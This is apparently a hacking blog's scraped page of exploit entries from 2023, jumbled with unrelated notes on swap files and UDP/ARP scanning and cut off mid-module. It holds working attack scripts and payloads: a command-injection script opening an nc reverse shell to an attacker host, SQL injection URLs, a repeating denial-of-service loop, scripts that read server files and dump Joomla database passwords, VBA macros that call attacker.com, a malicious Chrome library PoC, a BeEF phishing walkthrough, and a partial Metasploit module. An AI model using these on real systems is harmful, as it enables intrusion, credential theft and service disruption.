# Exploit Title: Snitz Forum v1.0 - Blind SQL Injection
# Date: 13/03/2023
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://forum.snitz.com/
# Software Link: https://sourceforge.net/projects/sf2k/files/
# Version: ALL VERSION
# Tested on: Windows 10
[code]
._ _______.
*/ ///______I
) . /_(_)
/__/ *0day PoC*
http://www.site.com/forum/cal.asp?date=25/03/2023 <= SQLi ???
http://www.site.com/forum/log.asp?log_id=3456 <= Blind SQLi #!WORK!#
._________.
*/ ///______I
) . /_(_)
/__/*0day PoC End*
[/code]
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109541
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343
import requests
import argparse
def exploit(target,attacker,port):
url = f'{target}/index.php/management/set_timezone'
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin': f'{target}',
'Referer': f'{target}/index.php/management/datetime',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close'
}
print(f"Sending Request")
data = {
'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc
{attacker} {port} 1>/tmp/pipe`'
}
response = requests.post(url, headers=headers, data=data)
# print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Parse target, attacker,
and port.',)
parser.add_argument('--target','-t', type=str, help='The target IP
address or hostname. example : http://192.168.254')
parser.add_argument('--attacker','-a', type=str, help='The attacker IP
address or hostname.')
parser.add_argument('--port', '-p',type=int, help='Listening port')
args = parser.parse_args()
try:
exploit(args.target,args.attacker,args.port)
except:
parser.print_help()
print("Exploit done")
# Exploit Title: FortiRecorder 6.4.3 - Denial of Service
# Google Dork: N/A
# Date: 13/03/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder
# Version: 6.4.3 and below && 6.0.11 to 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2022-41333
# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388
# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5
import requests
import warnings
import sys
from urllib.parse import unquote
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
def POST(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: POST")
print("[+] Payload : " +payload)
post_url = target+"/module/admin.fe"
post_headers = {"User-Agent": "CVE-2022-41333", "Content-Type": "application/x-www-form-urlencoded"}
url_decoder = unquote(payload)
full_payload = "fewReq="+url_decoder
while True:
r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
def GET(target, req_type, payload):
print("[+] Target : "+target)
print("[+] Request Type: GET")
print("[+] Payload : " +payload)
while True:
url = target+"/module/admin.fe?fewReq="+payload
headers = {"User-Agent": "CVE-2022-41333", "Connection": "close"}
r = requests.get(url, headers=headers, verify=False)
if "Failed: Access denied" in r.text:
print("[+] Payload Sent.")
else:
print("[!] Something went wrong!")
print(r.text)
print("[+] Starting ..")
target = str((sys.argv[1])) # https://fortirecorder.fortidemo.com
req_type = str((sys.argv[2])) # POST or GET
payload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi
if "post" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
POST(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
elif "get" in req_type.lower():
if "https" in target.lower() or "http" in target.lower():
GET(target, req_type, payload)
else:
print("[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]")
else:
print("[!] Invalid Request Type.")
# Exploit Title: Wondershare Dr Fone 12.9.6 - Privilege Escalation
# Date: 14 March 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://drfone.wondershare.com
# Software Link: https://mega.nz/file/ZFd1TZIR#e2WfCX_ryaH08C3VNGZH1yAIG6DU01p-M_rDooq529I
# Version: Dr Fone version 12.9.6
# Tested on: Window 10 (10.0.19045.2604)
# CVE : CVE-2023-27010
*Vulnerability description*:
Wondershare Dr Fone version 12.9.6 running services named "WsDrvInst" on
Windows have weak service permissions and are susceptible to local
privilege escalation vulnerability. Weak service permissions run with
system user permission, allowing a standard user/domain user to elevate to
administrator privilege upon successfully modifying the service or
replacing the affected executable. DriverInstall.exe gave modification
permission to any authenticated users in the windows operating system,
allowing standard users to modify the service and leading to Privilege
Escalation.
C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe
Everyone:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst
SERVICE_NAME: WsDrvInst
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
# Title: Adobe Connect 11.4.5 - Local File Disclosure
# Author: h4shur
# date:2021.01.16-2023.02.17
# CVE: CVE-2023-22232
# Vendor Homepage: https://www.adobe.com
# Software Link: https://www.adobe.com/products/adobeconnect.html
# Version: 11.4.5 and earlier, 12.1.5 and earlier
# User interaction: None
# Tested on: Windows 10 & Google Chrome, kali linux & firefox
### Summary:
Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature.
Exploitation of this issue does not require user interaction.
### Description :
There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team.
* What is LFD bug?
LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug
* Intruder access level with LFD bug
The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access
* Identify vulnerable sites
To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file
* And this time the "lfd" in "adobe connect" bug:
To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable.
You can download the file by writing the file path and file name and extension.
When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer
file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file.
* There are values inside the url that do not allow a file other than this file to be downloaded.
* Values: sco_id and tickets
But if these values are cleared, you will see that reloading is possible without any obstacles
At another address, you can download multiple files as a zip file.
We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension.
### POC :
https://target.com/[folder]/download?download-url=[URL]&name=[file.type]
https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder]
### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232
https://nvd.nist.gov/vuln/detail/CVE-2023-22232
https://helpx.adobe.com/security/products/connect/apsb23-05.html
1. Check memory usage
Check the usage of virtual memory before swap is added
free -m
2. Create swap file
Use the dd command to create a swap file with a size of 2G
dd if=/dev/zero of=/home/swap bs=1024 count=2048000 The larger the file, the more factory the time it is created.
3. Convert to swap format
Convert file format to swap format
mkswap /home/swap
4. Mount the swap partition
Use the swapon command to mount the swap partition to the swap partition
swapon /home/swap If an error is reported: swapon: /home/swap: insecure permissions 0644, 0600 suggested.
Modify permissions:
chmod 600 /home/swap
5. Check the memory usage again
Pay attention to the changes in observation and 1.
free -m
6. Setting up restart is still valid
To prevent the swap partition from becoming 0 after restart, you need to modify the /etc/fstab file:
At the end of the file (the last line)
/home/swap swap swap default 0 0
7. Deactivate virtual memory
swapoff -v /home/swap
#!/usr/bin/env python3
# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
import argparse
import requests
from termcolor import colored
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
def get_normalized_url(url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def get_proxy_protocol(url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str,
help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str,
help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str,
help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()
if args.proxy:
proxy_url = get_normalized_url(args.proxy)
proxy_protocol = get_proxy_protocol(proxy_url)
proxies = { proxy_protocol: proxy_url }
else:
proxies = {}
base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE
request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
print_message("Could not connect to provided URL!", "ERROR")
exit()
request = requests.get(exploit_url, proxies=proxies)
file_content = request.text
print(file_content)
Environmental description:
kali linux(192.168.0.114) Heikuidi device win7 (192.168.0.113) Girls' pc
Meet beef
BEEF (The Browser Exploitation Framework): A browser attack framework developed in Ruby language, a module installed by default in Kali, used to implement attacks and exploitation of XSS vulnerabilities.
BeEF mainly inserts a JS script code called hook.js into the web page. If the browser visits a page with hook.js (hook), it will be hooked (hooked). The hooked browser will execute the initial code to return some information. Then the target host will send a request to the BeEF server every once in a while (default is 1 second), asking whether there is new code to be executed. BeEF servers are essentially like web applications, divided into front-end and back-end. The front-end will poll the back-end whether there is new data that needs to be updated. At the same time, the front-end can also send instructions to the back-end. BeEF holders can log in to the back-end of BeEF through the browser to control the front-end (user's browser). BeEF is generally used in conjunction with XSS vulnerabilities.
Start BEEF
Method 1: Click the icon in the column to start.
Method 2: Execute the command beef-xss
Kali has already made beef-xss a service, and we can also use the systemctl command to start or close the beef service
systemctl start beef-xss.service #Enable beef service
systemctl stop beef-xss.service #Close beef service
systemctl restart beef-xss.service #Restart beef service Note: The initial configuration requires us to enter our account and password (set it yourself)
After startup is completed, it will automatically jump to the browser's management page. Enter the account number and password we just set and log in to the system. The initial account and password are beef
Configure our hooks
There are two methods to briefly talk about here:
Method 1: Find a website containing xss vulnerability and insert js to achieve the attack target.
Method 2: Write a poisonous web page yourself for others to visit. (Internal network + external network)
Here we take Method 2 as the column: write a simple page.
!doctype html
html
head
meta charset='utf-8'
title la la la la la la la la la/title
/head
Body
h1bbskali.cn/h1
script src='http://192.168.0.114:3000/hook.js'/script
/body
/html
In other words, find a way to get others to visit the page I just wrote. You can achieve the target of the attack. There are many methods, such as man-in-the-middle attack, redirection, black page hanging, etc.
Attack Demo
Demo 1 (device online)
When the attack side visits our web page, we can see the online device in the beef console.
Device Attack
Click on our device and select the commands tab. We can see that there are many attack modules.
Readers may find that there is a small circle logo with color (green, gray, orange, red) in front of each module.
Internally, BeEF can detect which command modules can work in the currently victimized browser and indicate in color:
Green: The command module can run on the target browser, and the user will not feel any abnormalities.
Orange: The command module can run on the target browser, but the user may feel abnormal (such as pop-ups, prompts, jumps, etc.)
Gray: The command module has not been verified for this target, i.e. it is not known whether it can be run.
Red: The command module does not work for this target
Here are a few modules for you. Everyone else entertains themselves!
Let the browser automatically access the specified website
Click Browser--hooked Doman--Redirect Browser Enter our target URL and click Execute to complete the attack. Return to the page I just opened and found that I automatically jumped to the kali forum.
Pop up dialog box
Click Browser--hooked Doman --Create Alert Dialog to enter the information we want to pop up and click Execute to complete the attack.
The effect is as follows
Popt the input information box
Click Browser--hooked Doman --Create Prompt Dialog to enter the information we want to pop up and click Execute to complete the attack.
In the same way, after we enter the information, we can see the information we just entered in the management panel!
Results
Make a phishing website
Select Scoial Engineering--Google phishing to our kali ip address. Click Execute
Our page has become Google's login page
Enter our account number and password
Password obtained
## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 03.16.2023
## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
## CVE ID: CVE-2023-23399
## Description:
The malicious user can exploit the victim's PC remotely.
For example, when the score indicates that the Attack Vector is Local
and User Interaction is Required, this could describe an exploit in
which an attacker, through social engineering, convinces a victim to
download and open a specially crafted file from a website which leads
to a local attack on their computer.
STATUS: HIGH Vulnerability
[+]Exploit0:
```
Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute
"microsoft-edge:https://attacker.com"
End Sub
```
[+]Exploit1:
```
Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)
## Proof and Exploit:
[href](https://streamable.com/dnyfx0)
## Time spend:
03:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Restaurant Management System 1.0 - SQL Injection
# Date: 2023-03-20
# Exploit Author: calfcrusher (calfcrusher@inventati.org)
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link:
https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: 1.0
# Tested on: Apache 2.4.6, PHP 5.4.16
Endpoint: /rms/delete-order.php
Vulnerable parameter: id (GET)
Time Base SQL Injection payloads
http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--
#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1
*Description*
Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `libnssckbi.so` in the specified path.
*exploit*
Following is the POC that could be used to reproduce the issue:
echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory is writable..."
echo "[+] Directory is writable..."
echo "[+] Generating malicious File libnssckbi.so ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
fi
fi
Upon closing the browser windows, the application executes the malicious code
*Impact*
The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.
# Exploit Title: ActFax 10.10 - Unquoted Path Services
# Date: 22/03/2023
# Exploit Author: Birkan ALHAN (@taftss)
# Vendor Homepage: https://www.actfax.com
# Software Link: https://www.actfax.com/en/download.html
# Version: Version 10.10, Build 0551 (2023-02-01)
# Tested on: Windows 10 21H2 OS Build 19044.2728
#Discover to Unquoted Services Path:
C:\Users\taftss>sc qc ActiveFaxServiceNT
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveFaxServiceNT
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ActiveFax-Server-Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\taftss>systeminfo
Host Name: RedsTaftss
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
#Another Discover Methot to Unquoted Services Path:
wmic service get name,displayname,pathname,startmode | findstr /i
"auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
#Exploit:
If the attacker has taken over the system and the taken user has write
privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they
can inject their own malicious "ActSrvNT.exe" file. Then the
ActiveFaxServiceNT Service can be restarted to privilege escalation.
--
*Birkan ALHAN*
#!/usr/bin/env ruby
# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752
## References:
## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
## - https://vulncheck.com/blog/joomla-for-rce
## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml
# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'
doc = <<~DOCOPT
#{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}
#{Paint['Usage:', :red]}
#{__FILE__} <url> [options]
#{__FILE__} -h | --help
#{Paint['Parameters:', :red]}
<url> Root URL (base path) including HTTP scheme, port and root folder
#{Paint['Options:', :red]}
--debug Display arguments
--no-color Disable colorized output (NO_COLOR environment variable is respected too)
-h, --help Show this screen
#{Paint['Examples:', :red]}
#{__FILE__} http://127.0.0.1:4242
#{__FILE__} https://example.org/subdir
#{Paint['Project:', :red]}
#{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
#{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
#{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT
def fetch_users(root_url, http)
vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
http.get(vuln_url)
end
def parse_users(root_url, http)
data_json = fetch_users(root_url, http)
data = JSON.parse(data_json)['data']
users = []
data.each do |user|
if user['type'] == 'users'
id = user['attributes']['id']
name = user['attributes']['name']
username = user['attributes']['username']
email = user['attributes']['email']
groups = user['attributes']['group_names']
users << {id: id, name: name, username: username, email: email, groups: groups}
end
end
users
end
def display_users(root_url, http)
users = parse_users(root_url, http)
puts Paint['Users', :red, :bold]
users.each do |u|
puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
end
end
def fetch_config(root_url, http)
vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
http.get(vuln_url)
end
def parse_config(root_url, http)
data_json = fetch_config(root_url, http)
data = JSON.parse(data_json)['data']
config = {}
data.each do |entry|
if entry['type'] == 'application'
key = entry['attributes'].keys.first
config[key] = entry['attributes'][key]
end
end
config
end
def display_config(root_url, http)
c = parse_config(root_url, http)
puts Paint['Site info', :red, :bold]
puts "Site name: #{c['sitename']}"
puts "Editor: #{c['editor']}"
puts "Captcha: #{c['captcha']}"
puts "Access: #{c['access']}"
puts "Debug status: #{c['debug']}"
puts
puts Paint['Database info', :red, :bold]
puts "DB type: #{c['dbtype']}"
puts "DB host: #{c['host']}"
puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
puts "DB name: #{c['db']}"
puts "DB prefix: #{c['dbprefix']}"
puts "DB encryption #{c['dbencryption']}"
end
begin
args = Docopt.docopt(doc)
Paint.mode = 0 if args['--no-color']
puts args if args['--debug']
http = HTTPX
display_users(args['<url>'], http)
puts
display_config(args['<url>'], http)
rescue Docopt::Exit => e
puts e.message
end
UDP introduction:
UDP (User Datagram Protocol) is a connectionless protocol, which is in the fourth layer-transport layer, and is at the upper layer of the IP protocol. UDP has the disadvantage of not providing packet packets, assembling, and not being able to sort data packets. That is, after the message is sent, it is impossible to know whether it has arrived safely and completely.
UDP significant features:
1.UDP lacks reliability. UDP itself does not provide mechanisms such as confirmation, timeout retransmission, etc. UDP datagrams may be copied and reordered in the network, and there is no guarantee that each datagram will only arrive once. 2. UDP datagrams have lengths. Each UDP datagram has a length, and if a datagram reaches its destination correctly, the length of the datagram will be passed along with the data to the receiver. TCP is a byte stream protocol without any (on the protocol) record boundary. 3.UDP is connected without connection. There is no need for a long-term relationship between UDP clients and servers. Most UDP implementations choose to ignore the source station suppression errors. When network congestion is caused, the destination cannot receive a large number of UDP datagrams. 4. UDP supports multicast and broadcasting.
Use nmap to scan
nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500 or
nmap -sU -T4 -sV 192.168.0.1/24
msf scan
msf5 use auxiliary/scanner/discovery/udp_probe
msf5 auxiliary(scanner/discovery/udp_probe) show options
Module options (auxiliary/scanner/discovery/udp_probe):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/discovery/udp_probe) set RHOSTS 192.168.0.1/24
RHOSTS=192.168.0.1/24
msf5 auxiliary(scanner/discovery/udp_probe) set THREADS 10
THREADS=10
msf5 auxiliary(scanner/discovery/udp_probe) run
Or execute
use auxiliary/scanner/discovery/udp_sweep
ARP Introduction:
ARP, a network transmission protocol that is extremely important in network protocol packets by parsing network layer addresses. Get a TCP/IP protocol for physical address based on IP address. When the host sends information, it broadcasts an ARP request containing the target IP address to all hosts on the network and receives a return message to determine the target's physical address.
nmap scan
nmap -sn -PR 192.168.0.1/24
Popularization of OSI seven-layer model diagram
# Exploit Title: Lucee Scheduled Job v1.0 - Command Execution
# Date: 3-23-2012
# Exploit Author: Alexander Philiotis
# Vendor Homepage: https://www.lucee.org/
# Software Link: https://download.lucee.org/
# Version: All versions with scheduled jobs enabled
# Tested on: Linux - Debian, Lubuntu & Windows 10
# Ref : https://www.synercomm.com/blog/scheduled-tasks-with-lucee-abusing-built-in-functionality-for-command-execution/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Retry
include Msf::Exploit::FileDropper
require 'base64'
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Lucee Authenticated Scheduled Job Code Execution',
'Description' => %q{
This module can be used to execute a payload on Lucee servers that have an exposed
administrative web interface. It's possible for an administrator to create a
scheduled job that queries a remote ColdFusion file, which is then downloaded and executed
when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed,
the payload will run as the user specified during the Lucee installation. On Windows, this is a service account;
on Linux, it is either the root user or lucee.
},
'Targets' => [
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :windows_cmd
}
],
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd
}
]
],
'Author' => 'Alexander Philiotis', # aphiliotis@synercomm.com
'License' => MSF_LICENSE,
'References' => [
# This abuses the functionality inherent to the Lucee platform and
# thus is not related to any CVEs.
# Lucee Docs
['URL', 'https://docs.lucee.org/'],
# cfexecute & cfscript documentation
['URL', 'https://docs.lucee.org/reference/tags/execute.html'],
['URL', 'https://docs.lucee.org/reference/tags/script.html'],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
# /opt/lucee/server/lucee-server/context/logs/application.log
# /opt/lucee/web/logs/exception.log
IOC_IN_LOGS,
ARTIFACTS_ON_DISK,
# ColdFusion files located at the webroot of the Lucee server
# C:/lucee/tomcat/webapps/ROOT/ by default on Windows
# /opt/lucee/tomcat/webapps/ROOT/ by default on Linux
]
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DisclosureDate' => '2023-02-10'
)
)
register_options(
[
Opt::RPORT(8888),
OptString.new('PASSWORD', [false, 'The password for the administrative interface']),
OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']),
OptInt.new('PAYLOAD_DEPLOY_TIMEOUT', [false, 'Time in seconds to wait for access to the payload', 20]),
]
)
deregister_options('URIPATH')
end
def exploit
payload_base = rand_text_alphanumeric(8..16)
authenticate
start_service({
'Uri' => {
'Proc' => proc do |cli, req|
print_status("Payload request received for #{req.uri} from #{cli.peerhost}")
send_response(cli, cfm_stub)
end,
'Path' => '/' + payload_base + '.cfm'
}
})
#
# Create the scheduled job
#
create_job(payload_base)
#
# Execute the scheduled job and attempt to send a GET request to it.
#
execute_job(payload_base)
print_good('Exploit completed.')
#
# Removes the scheduled job
#
print_status('Removing scheduled job ' + payload_base)
cleanup_request = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'action' => 'services.schedule'
},
'vars_post' => {
'row_1' => '1',
'name_1' => payload_base.to_s,
'mainAction' => 'delete'
}
})
if cleanup_request && cleanup_request.code == 302
print_good('Scheduled job removed.')
else
print_bad('Failed to remove scheduled job.')
end
end
def authenticate
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'vars_post' => {
'login_passwordweb' => datastore['PASSWORD'],
'lang' => 'en',
'rememberMe' => 's',
'submit' => 'submit'
}
})
unless auth
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
unless auth.code == 200 && auth.body.include?('nav_Security')
fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.')
end
print_good('Authenticated successfully')
end
def create_job(payload_base)
create_job = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'keep_cookies' => true,
'vars_get' => {
